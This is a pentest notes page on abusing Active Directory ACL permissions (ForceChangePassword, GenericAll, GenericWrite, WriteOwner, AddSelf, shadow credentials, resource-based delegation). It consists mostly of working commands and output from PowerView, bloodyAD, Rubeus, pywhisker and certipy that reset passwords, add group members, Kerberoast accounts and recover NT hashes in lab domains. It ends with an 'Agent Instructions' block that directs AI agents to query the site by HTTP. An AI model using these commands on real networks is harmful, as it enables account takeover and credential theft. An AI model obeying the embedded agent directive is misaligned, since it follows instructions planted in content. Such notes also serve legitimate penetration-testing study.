# ACL [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) ## Interesting ACL * [ForceChangePassword](https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html#forcechangepassword) abused with `Set-DomainUserPassword` - gives us the right to reset a user's password without first knowing their password (should be used cautiously and typically best to consult our client before resetting passwords). * `Add Members` abused with `Add-DomainGroupMember` * [`GenericAll`](https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html#genericall) abused with `Set-DomainUserPassword` or `Add-DomainGroupMember` - this grants us full control over a target object. Again, depending on if this is granted over a user or group, we could modify group membership, force change a password, or perform a targeted Kerberoasting attack. If we have this access over a computer object and the [Local Administrator Password Solution (LAPS)](https://www.microsoft.com/en-us/download/details.aspx?id=46899) is in use in the environment, we can read the LAPS password and gain local admin access to the machine which may aid us in lateral movement or privilege escalation in the domain if we can obtain privileged controls or gain some sort of privileged access. * [`GenericWrite`](https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html#genericwrite) abused with `Set-DomainObject` - gives us the right to write to any non-protected attribute on an object. If we have this access over a user, we could assign them an SPN and perform a Kerberoasting attack (which relies on the target account having a weak password set). Over a group means we could add ourselves or another security principal to a given group. Finally, if we have this access over a computer object, we could perform a resource-based constrained delegation attack which is outside the scope of this module. * `WriteOwner` abused with `Set-DomainObjectOwner` * `WriteDACL` abused with `Add-DomainObjectACL` * `AllExtendedRights` abused with `Set-DomainUserPassword` or `Add-DomainGroupMember` * `Addself` abused with `Add-DomainGroupMember` - shows security groups that a user can add themselves to.
{% embed url="" %} ## Tools ### AbuseACL Script to automatically list vulnerable Windows ACEs/ACLs. {% embed url="" %} ### ACLpwn {% embed url="" %} ### SharpADWS {% embed url="" %} ``` C:\Users\Marcus>SharpADWS.exe acl -dn "OU=Domain Controllers,DC=corp,DC=local" -scope Subtree -trustee Marcus Severity : Critical ObjectDN : CN=DC01,OU=Domain Controllers,DC=corp,DC=local AccessControlType : Allow ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite ObjectType : All Trustee : Marcus IsInherited : False ``` More commands on the github repo ### ADACLScanner {% embed url="" %} ### PowerDACL {% embed url="" %} ## ACL Enumeration ### PowerView ```powershell Find-InterstingDomainAcl -ResolveGUIDs ``` ```powershell-session PS C:\htb> Import-Module .\PowerView.ps1 PS C:\htb> $sid = Convert-NameToSid wley ``` ```powershell-session PS C:\htb> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid} ObjectDN : CN=Dana Amundsen,OU=DevOps,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL ObjectSID : S-1-5-21-3842939050-3880317879-2865463114-1176 ActiveDirectoryRights : ExtendedRight ObjectAceFlags : ObjectAceTypePresent ObjectAceType : 00299570-246d-11d0-a768-00aa006e0529 InheritedObjectAceType : 00000000-0000-0000-0000-000000000000 BinaryLength : 56 AceQualifier : AccessAllowed IsCallback : False OpaqueLength : 0 AccessMask : 256 SecurityIdentifier : S-1-5-21-3842939050-3880317879-2865463114-1181 AceType : AccessAllowedObject AceFlags : ContainerInherit IsInherited : False InheritanceFlags : ContainerInherit PropagationFlags : None AuditFlags : None ``` ```powershell-session PS C:\htb> $guid= "00299570-246d-11d0-a768-00aa006e0529" PS C:\htb> Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl Name : User-Force-Change-Password DisplayName : Reset Password DistinguishedName : CN=User-Force-Change-Password,CN=Extended-Rights,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL rightsGuid : 00299570-246d-11d0-a768-00aa006e0529 ``` #### One in all ```powershell-session PS C:\htb> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} AceQualifier : AccessAllowed ObjectDN : CN=Dana Amundsen,OU=DevOps,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL ActiveDirectoryRights : ExtendedRight ObjectAceType : User-Force-Change-Password ObjectSID : S-1-5-21-3842939050-3880317879-2865463114-1176 InheritanceFlags : ContainerInherit BinaryLength : 56 AceType : AccessAllowedObject ObjectAceFlags : ObjectAceTypePresent IsCallback : False PropagationFlags : None SecurityIdentifier : S-1-5-21-3842939050-3880317879-2865463114-1181 AccessMask : 256 AuditFlags : None IsInherited : False AceFlags : ContainerInherit InheritedObjectAceType : All OpaqueLength : 0 ``` ```powershell-session PS C:\htb> $sid2 = Convert-NameToSid damundsen PS C:\htb> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} -Verbose AceType : AccessAllowed ObjectDN : CN=Help Desk Level 1,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite OpaqueLength : 0 ObjectSID : S-1-5-21-3842939050-3880317879-2865463114-4022 InheritanceFlags : ContainerInherit BinaryLength : 36 IsInherited : False IsCallback : False PropagationFlags : None SecurityIdentifier : S-1-5-21-3842939050-3880317879-2865463114-1176 AccessMask : 131132 AuditFlags : None AceFlags : ContainerInherit AceQualifier : AccessAllowed ``` ```powershell-session PS C:\htb> Get-DomainGroup -Identity "Help Desk Level 1" | select memberof memberof -------- CN=Information Technology,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL ``` ```powershell-session PS C:\htb> $itgroupsid = Convert-NameToSid "Information Technology" PS C:\htb> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $itgroupsid} -Verbose AceType : AccessAllowed ObjectDN : CN=Angela Dunn,OU=Server Admin,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL ActiveDirectoryRights : GenericAll OpaqueLength : 0 ObjectSID : S-1-5-21-3842939050-3880317879-2865463114-1164 InheritanceFlags : ContainerInherit BinaryLength : 36 IsInherited : False IsCallback : False PropagationFlags : None SecurityIdentifier : S-1-5-21-3842939050-3880317879-2865463114-4016 AccessMask : 983551 AuditFlags : None AceFlags : ContainerInherit AceQualifier : AccessAllowed ``` ```powershell-session PS C:\htb> $adunnsid = Convert-NameToSid adunn PS C:\htb> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $adunnsid} -Verbose AceQualifier : AccessAllowed ObjectDN : DC=INLANEFREIGHT,DC=LOCAL ActiveDirectoryRights : ExtendedRight ObjectAceType : DS-Replication-Get-Changes-In-Filtered-Set ObjectSID : S-1-5-21-3842939050-3880317879-2865463114 InheritanceFlags : ContainerInherit BinaryLength : 56 AceType : AccessAllowedObject ObjectAceFlags : ObjectAceTypePresent IsCallback : False PropagationFlags : None SecurityIdentifier : S-1-5-21-3842939050-3880317879-2865463114-1164 AccessMask : 256 AuditFlags : None IsInherited : False AceFlags : ContainerInherit InheritedObjectAceType : All OpaqueLength : 0 AceQualifier : AccessAllowed ObjectDN : DC=INLANEFREIGHT,DC=LOCAL ActiveDirectoryRights : ExtendedRight ObjectAceType : DS-Replication-Get-Changes ObjectSID : S-1-5-21-3842939050-3880317879-2865463114 InheritanceFlags : ContainerInherit BinaryLength : 56 AceType : AccessAllowedObject ObjectAceFlags : ObjectAceTypePresent IsCallback : False PropagationFlags : None SecurityIdentifier : S-1-5-21-3842939050-3880317879-2865463114-1164 AccessMask : 256 AuditFlags : None IsInherited : False AceFlags : ContainerInherit InheritedObjectAceType : All OpaqueLength : 0 ``` ### Get-Acl & GetADUser ```powershell-session PS C:\htb> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt ``` ```powershell-session PS C:\htb> foreach($line in [System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")) {get-acl "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}} Path : Microsoft.ActiveDirectory.Management.dll\ActiveDirectory:://RootDSE/CN=Dana Amundsen,OU=DevOps,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL ActiveDirectoryRights : ExtendedRight InheritanceType : All ObjectType : 00299570-246d-11d0-a768-00aa006e0529 InheritedObjectType : 00000000-0000-0000-0000-000000000000 ObjectFlags : ObjectAceTypePresent AccessControlType : Allow IdentityReference : INLANEFREIGHT\wley IsInherited : False InheritanceFlags : ContainerInherit PropagationFlags : None ``` ## NXC ``` nxc ldap 192.168.1.48 -u raj -p Password@1 --kdcHost ignite.local -M daclread -o TARGET=Administrator ACTION=read ```
## Hidden OU ACLs {% embed url="" %} ## ForceChangePassword wley -> ForceChangePassword -> damundsen
Run as wley ```powershell-session PS C:\htb> $SecPassword = ConvertTo-SecureString '' -AsPlainText -Force PS C:\htb> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword) ``` New password ```powershell-session PS C:\htb> $damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force ``` Change Pass ```powershell-session PS C:\htb> cd C:\Tools\ PS C:\htb> Import-Module .\PowerView.ps1 PS C:\htb> Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose VERBOSE: [Get-PrincipalContext] Using alternate credentials VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'damundsen' VERBOSE: [Set-DomainUserPassword] Password for user 'damundsen' successfully reset ``` ### With BloodyAD ``` bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password ``` ### With RPCclient ``` $ rpcclient -U support 10.10.10.192 Enter WORKGROUP\support's password: rpcclient $> setuserinfo2 Audit2020 23 'PleaseSub!' ```
{% embed url="" %} ## GenericWrite The typical techniques to abuse GenericWrite are: * shadowCredentials (windows server 2016 or later) * targetKerberoasting (the password should be weak enough to be cracked) * Resource-Based Constrained Delegation {% hint style="success" %} *With sufficient rights (GenericWrite or GenericAll) Kerberos preauth can be forced disabled as well -* [*AS REPRoasting*](/0xss0rz/pentest/internal-pentest/misconfiguration.md) {% endhint %}
### **Add Member - PowerView** Run as damundsen: ```powershell-session PS C:\htb> $SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force PS C:\htb> $Cred2 = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword) ``` Add member ```powershell-session PS C:\htb> Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose VERBOSE: [Get-PrincipalContext] Using alternate credentials VERBOSE: [Add-DomainGroupMember] Adding member 'damundsen' to group 'Help Desk Level 1' ``` Confirming user wad added to the group ```powershell-session PS C:\htb> Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName MemberName ---------- busucher spergazed damundsen dpayne ``` CleanUp - Remove user from group ```powershell-session PS C:\htb> Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose VERBOSE: [Get-PrincipalContext] Using alternate credentials VERBOSE: [Remove-DomainGroupMember] Removing member 'damundsen' from group 'Help Desk Level 1' True ``` ### Add Member - BloodyAD ``` bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add ``` ### Disable Kerberos Pre Auth - ASREP Roast {% content-ref url="/pages/FPIbdosGSrSHYzhw5i4w" %} [Misconfiguration](/0xss0rz/pentest/internal-pentest/misconfiguration.md) {% endcontent-ref %} ### Targeted Kerberoast #### Linux ``` $ sudo ntpdate dc01.certified.htb | ./targetedKerberoast.py -v -d 'certified.htb' -u 'judith.mader' -p 'judith09' --dc-ip 10.10.11.41 ``` #### Windows Enumerate the permissions for one group with PowerView ``` Find-InterstingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"} ``` Check if a the victim already has a SPN * PowerView ``` Get-DomainUser -Identity victim | select serviceprinicpalname ``` * AD Module ``` Get-ADUser -Identity victim -Properties ServicePrincipalName | select ServicePrincipalName ``` Set a SPN for the victim * PowerView ``` Set-DomainObject -Identity victim -Set @{serviceprincipalname='domain/whatever'} ``` * AD Module ``` Set-ADUser -Identity victim -ServicePrincipalNames @{Add='domain/whatever'} ``` Kerberoast the vicitm ``` Rubeus.exe kerberoast /outfile:targetedhahses.txt john.exe --wordlist=C:\path\to\10k-worst-pass.txt C:\path\to\targetedhashes.txt ``` ### [RBCD - Resource Based Constrained Delegation](#rbcd-resource-based-constrained-delegation-rbcd) {% content-ref url="/pages/meZ0VXkB0aGPLQ3Q5Hot" %} [Trustee and Resource Delegation](/0xss0rz/pentest/internal-pentest/trustee-and-resource-delegation.md) {% endcontent-ref %} ### Windows Server 2008 Traditional methosds (shadow credential, RBCD, targetedKerberoast) can not be used -> change password ``` net rpc password 'TARGET$' Passw0rd1 -U retro2.vl/'ControlledUser$'%P@ssw0rd -S BLN01.retro2.vl ``` {% embed url="" %} ## GenericAll {% hint style="success" %} *With sufficient rights (GenericWrite or GenericAll) Kerberos preauth can be forced disabled as well -* [*AS REPRoasting*](/0xss0rz/pentest/internal-pentest/misconfiguration.md) {% endhint %}
### [Add member](#add-member) ``` C:> net group "groupName" targetUser /domain /add ``` ### [**Targeted kerberoast**](#targeted-kerberoast) {% embed url="" %} ```powershell-session PS C:\htb> Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain VERBOSE: [Get-Domain] Extracted domain 'INLANEFREIGHT' from -Credential VERBOSE: [Get-DomainSearcher] search base: LDAP://ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=adunn)(name=adunn)(displayname=adunn)))) VERBOSE: [Set-DomainObject] Setting 'serviceprincipalname' to 'notahacker/LEGIT' for object 'adunn' ``` ```powershell-session PS C:\htb> .\Rubeus.exe kerberoast /user:adunn /nowrap ``` {% content-ref url="/pages/WyP2ypGRBLxj0wkF4CEb" %} [Kerberoast](/0xss0rz/pentest/internal-pentest/kerberoast.md) {% endcontent-ref %} CleanUp - Remove fake SPN ```powershell-session PS C:\htb> Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain VERBOSE: [Get-Domain] Extracted domain 'INLANEFREIGHT' from -Credential VERBOSE: [Get-DomainSearcher] search base: LDAP://ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=adunn)(name=adunn)(displayname=adunn)))) VERBOSE: [Set-DomainObject] Clearing 'serviceprincipalname' for object 'adunn' ``` Other Example
``` PS C:\Users\mssqladm\Desktop> Import-Module .\PowerView.ps1 PS C:\Users\mssqladm\Desktop> Get-DomainUser 'ttimmons' | Select serviceprincipalname serviceprincipalname -------------------- PS C:\Users\mssqladm\Desktop> Set-DomainObject -Identity 'ttimmons' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'} PS C:\Users\mssqladm\Desktop> $User = Get-DomainUser 'ttimmons' PS C:\Users\mssqladm\Desktop> $User | Get-DomainSPNTicket | fl ```
### RBCD - Resource Based Constrained Delegation RBCD {% content-ref url="/pages/meZ0VXkB0aGPLQ3Q5Hot" %} [Trustee and Resource Delegation](/0xss0rz/pentest/internal-pentest/trustee-and-resource-delegation.md) {% endcontent-ref %} Change user Context ``` *Evil-WinRM* PS C:\> $TargetComputer = 'TARGET.domain.local' *Evil-WinRM* PS C:\> $UserWithDaclUsername = 'domain.local\test' *Evil-WinRM* PS C:\> $UserWithDaclPassword = ConvertTo-SecureString 'Password' -AsPlainText -Force *Evil-WinRM* PS C:\> $Cred = New-Object System.Management.Automation.PSCredential($UserWithDaclUsername, $UserWithDaclPassword) ``` 1 - Add a new attacker-controlled computer account ``` *Evil-WinRM* PS C:\> Import-Module .\Powermad.ps1 *Evil-WinRM* PS C:\> New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force) -Verbose -Credential $Cred Verbose: [+] Domain Controller = Verbose: [+] Domain = domain.local Verbose: [+] SAMAccountName = attackersystem$ Verbose: [+] Distinguished Name = CN=attackersystem,CN=Computers,DC=domain,DC=local [+] Machine account attackersystem added ``` 2 - Build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE ``` *Evil-WinRM* PS C:\> Import-Module .\PowerView.ps1 *Evil-WinRM* PS C:\> $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid -Verbose -Credential $Cred | Select -Expand objectsid Verbose: [Get-Domain] Using alternate credentials for Get-Domain Verbose: [Get-Domain] Extracted domain 'domain.local' from -Credential Verbose: [Get-DomainSearcher] search base: LDAP://dc1.domain.local/DC=domain,DC=local Verbose: [Get-DomainSearcher] Using alternate credentials for LDAP connection Verbose: [Get-DomainComputer] Get-DomainComputer filter string: (&(samAccountType=805306369)(|(name=attackersystem))) *Evil-WinRM* PS C:\> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" *Evil-WinRM* PS C:\> $SDBytes = New-Object byte[] ($SD.BinaryLength) *Evil-WinRM* PS C:\> $SD.GetBinaryForm($SDBytes, 0) ``` 3 - Set this newly created security descriptor in the `msDS-AllowedToActOnBehalfOfOtherIdentity` field of the comptuer account ``` *Evil-WinRM* PS C:\> Get-DomainComputer $TargetComputer -Verbose -Credential $Cred | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose -Credential $Cred ``` Or automate the process with RbcdPwn.ps1 ``` PS C:\> Import-Module .\PowerView.ps1 PS C:\> Import-Module .\Powermad.ps1 PS C:\> Import-Module .\RbcdPwn.ps1 PS C:\> Invoke-RbcdPwn -FakeMachine fakemachine123 ``` 4 - Hash the plaintext password into its RC4\_HMAC form ```` PS C:\> .\Rubeus.exe hash /domain:domain.local /user:fakemachine123$ /password:P@ssw0rd! ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.0.2 [*] Action: Calculate Password Hash(es) [*] Input password : P@ssw0rd! [*] Input username : fakemachine123$ [*] Input domain : domain.local [*] Salt : DOMAIN.LOCALhostfakemachine123.domain.local [*] rc4_hmac : 217E50203A5ABA59CEFA863C724BF61B [*] aes128_cts_hmac_sha1 : 9B5A2BAF536BC1D4BABE30F732A8FB39 [*] aes256_cts_hmac_sha1 : EC73111B3BA6754EDAFF699140B8B989771EB671D52B640F622DF58E76181052 [*] des_cbc_md5 : 4FA1ECEFBAC776CD ``` ```` 5 - Get a service ticket for the service name (sname) we want to "pretend" to be "admin" ``` PS C:\> .\Rubeus.exe s4u /domain:domain.local /user:fakemachine123$ /rc4:217E50203A5ABA59CEFA863C724BF61B /impersonateuser:user_to_impersonate /msdsspn:http/web.domain.local /ptt ``` ``` PS C:\> cmd /c curl --negotiate -u : http://web.domain.local -o out.html -v ``` ### Disable Kerberos Pre Auth - ASREP Roast {% content-ref url="/pages/FPIbdosGSrSHYzhw5i4w" %} [Misconfiguration](/0xss0rz/pentest/internal-pentest/misconfiguration.md) {% endcontent-ref %} ### Change Password ``` evil-winrm -u "username" -p 'password' -i 10.10.11.42 Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\username\Documents> upload PowerView.ps1 Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command Info: Uploading /workspace/PowerView.ps1 to C:\Users\username\Documents\PowerView.ps1 Data: 1027036 bytes of 1027036 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Users\username\Documents> Import-Module .\PowerView.ps1 *Evil-WinRM* PS C:\Users\username\Documents> $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force *Evil-WinRM* PS C:\Users\username\Documents> Set-DomainUserPassword -Identity targettedUser -AccountPassword $UserPassword *Evil-WinRM* PS C:\Users\username\Documents> exit Info: Exiting with code 0 [Nov 22, 2024 - 03:13:42 (EST)] exegol-Lab /workspace # nxc smb 10.10.11.42 -u 'targettedUser' -p 'Password123!' --shares ``` #### With BloodyAD ``` bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password ``` ### On OU - **Generic Descendent Object Takeover**
``` # getTGT.py 'domain.htb/d.anderson:password' -dc-ip 10.10.11.31 # export KRB5CCNAME=d.anderson.ccache # dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=DOMAIN,DC=HTB' 'domain.htb/d.anderson' -k -no-pass -dc-ip 10.10.11.31 Impacket for Exegol - v0.10.1.dev1+20240403.124027.3e5f85b - Copyright 2022 Fortra - forked by ThePorgs [*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU [*] DACL backed up to dacledit-20241204-045901.bak [*] DACL modified successfully! ```
```` ``` # bloodyAD --host "dc01.domain.htb" -d "domain.htb" --kerberos --dc-ip 10.10.11.31 -u "d.anderson" -p "password" set password "e.rodriguez" "0xss0rzpass++++" [+] Password changed successfully! ```` ## AddSelf `AddSelf`, similar to `AddMember`. While `AddMember` is `WriteProperty` access right on the target's `Member` attribute, `AddSelf` is a `Self` access right on the target's `Member` attribute, allowing the attacker to add itself to the target group, instead of adding arbitrary principals. ``` # bloodyAD --host "10.10.11.31" -d "domain.htb" -u "e.rodriguez" -p '0xss0rzpass++++' add groupMember "chiefs marketing" "e.rodriguez" [+] e.rodriguez added to chiefs marketing ``` {% embed url="" %} ## AllExtendedRights Change password ``` bloodyAD --host "192.168.1.8" -d "ignite.local" -u "geet" -p "Password@1" set password "kavish" "Password@987" ``` {% embed url="" %} ## Shadow Credentials {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} Pre-requisites to abuse Shadow Credentials: * AD CS (Key Trust if AD CS is not present) * Support for PKINIT and at least one DC with Windows Server 2016 or above. * Permissions (**GenericWrite/GenericAll**) to modify the `msDS-KeyCredentialLink` attribute of the target object. In BloodHound: `AddKeyCredentialLink` {% embed url="" %} ### Linux - Pywhisker {% embed url="" %} pywhisker issue ``` [!] module 'OpenSSL.crypto' has no attribute 'PKCS12' ```
troubleshooting:
``` ┌──(kali㉿kali)-[~/Desktop/pywhisker] └─$ rm requirements.txt ┌──(kali㉿kali)-[~/Desktop/pywhisker] └─$ vim requirements.txt ┌──(kali㉿kali)-[~/Desktop/pywhisker] └─$ cat requirements.txt impacket pyOpenSSL==24.0.0 cryptography six pyasn1 ldap3 ldapdomaindump rich setuptools dsinternals ┌──(kali㉿kali)-[~/Desktop/pywhisker] └─$ pip3 install -r requirements.txt ``` {% embed url="" %} 
$ pywhisker.py -d "domain.htb" -u "owned" -H aad3b435b51**********5b51404ee:7fc6************b5a85a -td targetdomain.local --target "target" --action "list"
$ pywhisker.py -d "domain.htb" -u "owned" -H aad3b435b51**********5b51404ee:7fc6************b5a85a -td targetdomain.local --target "target" --action "add"
<--SNIP-->
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: QZrd2HfW.pfx
[*] Must be used with password: 7ZoeJDqSZnv5CtHwNY8K
[*] A TGT can now be obtained with
$ gettgtpkinit.py -cert-pfx QZrd2HfW.pfx -pfx-pass 7ZoeJDqSZnv5CtHwNY8K targetdomain.local/target QZrd2HfW.ccache
<--SNIP-->
INFO:minikerberos:AS-REP encryption key (you might need this later):
2024-03-17 05:05:07,420 minikerberos INFO     9b0312752bf1042f8a34616e8e641704c11aa0a08b4c6420e04f9bb32b4a1998
$ export KRB5CCNAME=QZrd2HfW.ccache
$ getnthash.py targetdomain.local/target -key 9b0312752bf1042f8a34616e8e641704c11aa0a08b4c6420e04f9bb32b4a1998 -debug -dc-ip [IP]
<--SNIP-->
Recovered NT Hash
cf3a*************ed5c58
``` ┌──(kali㉿kali)-[~/Desktop/pywhisker/pywhisker] └─$ python pywhisker.py -d "domain.htb" -u "controlledUser" -p "password" --target "targetedUser" --action "add" --dc-ip 10.10.11.41 [*] Searching for the target account [*] Target user found: CN=targetted user,CN=Users,DC=domain,DC=htb [*] Generating certificate [*] Certificate generated [*] Generating KeyCredential [*] KeyCredential generated with DeviceID: cf165020-4ec3-8daf-508f-259e8d1432dd [*] Updating the msDS-KeyCredentialLink attribute of targettedUser [+] Updated the msDS-KeyCredentialLink attribute of the target object [+] Saved PFX (#PKCS12) certificate & key at path: Nroyxf0a.pfx [*] Must be used with password: k9NDc9ioP2ctBPVjCxVg [*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools ┌──(kali㉿kali)-[~/Desktop/PKINITtools] └─$ sudo ntpdate dc01.domain.htb | python gettgtpkinit.py domain.htb/targettedUser -cert-pfx /home/kali/Desktop/pywhisker/pywhisker/Nroyxf0a.pfx -pfx-pass 'k9NDc9ioP2ctBPVjCxVg' targettedUser.ccache 2024-11-26 12:32:49,589 minikerberos INFO Loading certificate and key from file INFO:minikerberos:Loading certificate and key from file 2024-11-26 12:32:49,617 minikerberos INFO Requesting TGT INFO:minikerberos:Requesting TGT 2024-11-26 12:32:52,984 minikerberos INFO AS-REP encryption key (you might need this later): INFO:minikerberos:AS-REP encryption key (you might need this later): 2024-11-26 12:32:52,984 minikerberos INFO e0d4ce3341797354ca80223549a358554596114362dd3d532450cbc7709cf852 INFO:minikerberos:e0d4ce3341797354ca80223549a358554596114362dd3d532450cbc7709cf852 2024-11-26 12:32:52,988 minikerberos INFO Saved TGT to file INFO:minikerberos:Saved TGT to file ┌──(kali㉿kali)-[~/Desktop/PKINITtools] └─$ sudo ntpdate dc01.domain.htb | python getnthash.py domain.htb/targettedUser -key e0d4ce3341797354ca80223549a358554596114362dd3d532450cbc7709cf852 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Using TGT from cache [*] Requesting ticket to self with PAC Recovered NT Hash a091c1832bcdd4677c28b5a6a1295584 ``` ### Certipy shadow auto ``` [Mar 11, 2024 - 08:59:19 (CET)] exegol-Zephyr /workspace # proxychains -q certipy shadow auto -u "owned@domain.local" -p 'password' -account 'target_account' -dns-tcp -dc-ip [IP] Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Targeting user 'target_account' <--SNIP--> [*] Successfully restored the old Key Credentials for 'ZPH-SVRMGMT1$' [*] NT hash for 'target_account': 89d0*************ef2f ``` ### Abusing User Object Enumerate the permissions. ```powershell Find-InterestingDomainAcl-ResolveGUIDs|?{$_.IdentityReferenceName -match"StudentUsers"} ``` Add the Shadow Credential. {% embed url="" %} ```powershell Whisker.exe add /target:supportXuser ``` Linux - pyWhisker - cf The Hacker Recipes {% embed url="" %} Using PowerView, see if the Shadow Credential is added. ```powershell Get-DomainUser -Identity supportXuser ``` Request the TGT by leveraging the certificate. ```powershell Rubeus.exe asktgt /user:supportXuser /certificate:MIIJuAIBA<-SNIP-> /password:"1O<-SNIP->" /domain:domain.local /dc:DC.domain.local /getcredentials /show /nowrap ``` Inject the TGT in the current session or use the NTLM hash ```powershell Rubeus.exe ptt/ticket: ``` ### Abusing Computer Object Enumerate the permissions. ```powershell Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match'mgmtadmin’} ``` Add the Shadow Credentials. ```powershell SafetyKatz.exe"sekurlsa::pth /user:mgmtadmin /domain:domain.local /aes256: /run:cmd.exe" "exit" ``` ```powershell Whisker.exe add /target:computer$ ``` Using PowerView, see if the Shadow Credential is added. ```powershell Get-DomainComputer -Identity computer ``` Request the TGT by leveraging the certificate. ```powershell Rubeus.exe asktgt /user:computer$ /certificate:MIIJ0AIBA<-SNIP-> /password:"ViG<-SNIP->" /domain:domain.local /dc:DC.domain.local /getcredentials /show ``` Request and Inject the TGS by impersonating the user. ```powershell Rubeus.exe s4u /dc:dc.domain.local /ticket: /impersonateuser:administrator /ptt /self /altservice:cifs/computer ``` ### ShadowSpray {% embed url="" %} ## WriteOwner {% embed url="" %} {% embed url="" %} Grant Ownership ``` bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_group $target_username ``` ``` ./bloodyAD.py --host "10.10.11.41" -d "DC01.domain.local" -u "controlledUser" -p "password" set owner "CN=Management,CN=Users,DC=domain,DC=local" "CN=Controlled User,CN=Users,DC=domain,DC=local" ``` Grant yourself the `AddMember` privilege ``` dacledit.py -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'CN=Management,CN=Users,DC=domain,DC=local' -dc-ip '10.10.11.41' 'domain.local'/'controlledUser':'password' ``` Add member ``` ./bloodyAD.py --host "10.10.11.41" -d "domain.local" -u "controlledUser" -p "password" add groupMember "CN=Management,CN=Users,DC=domain,DC=local" "CN=controlled User,CN=Users,DC=domain,DC=local" ``` ## Resource {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/acl.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response 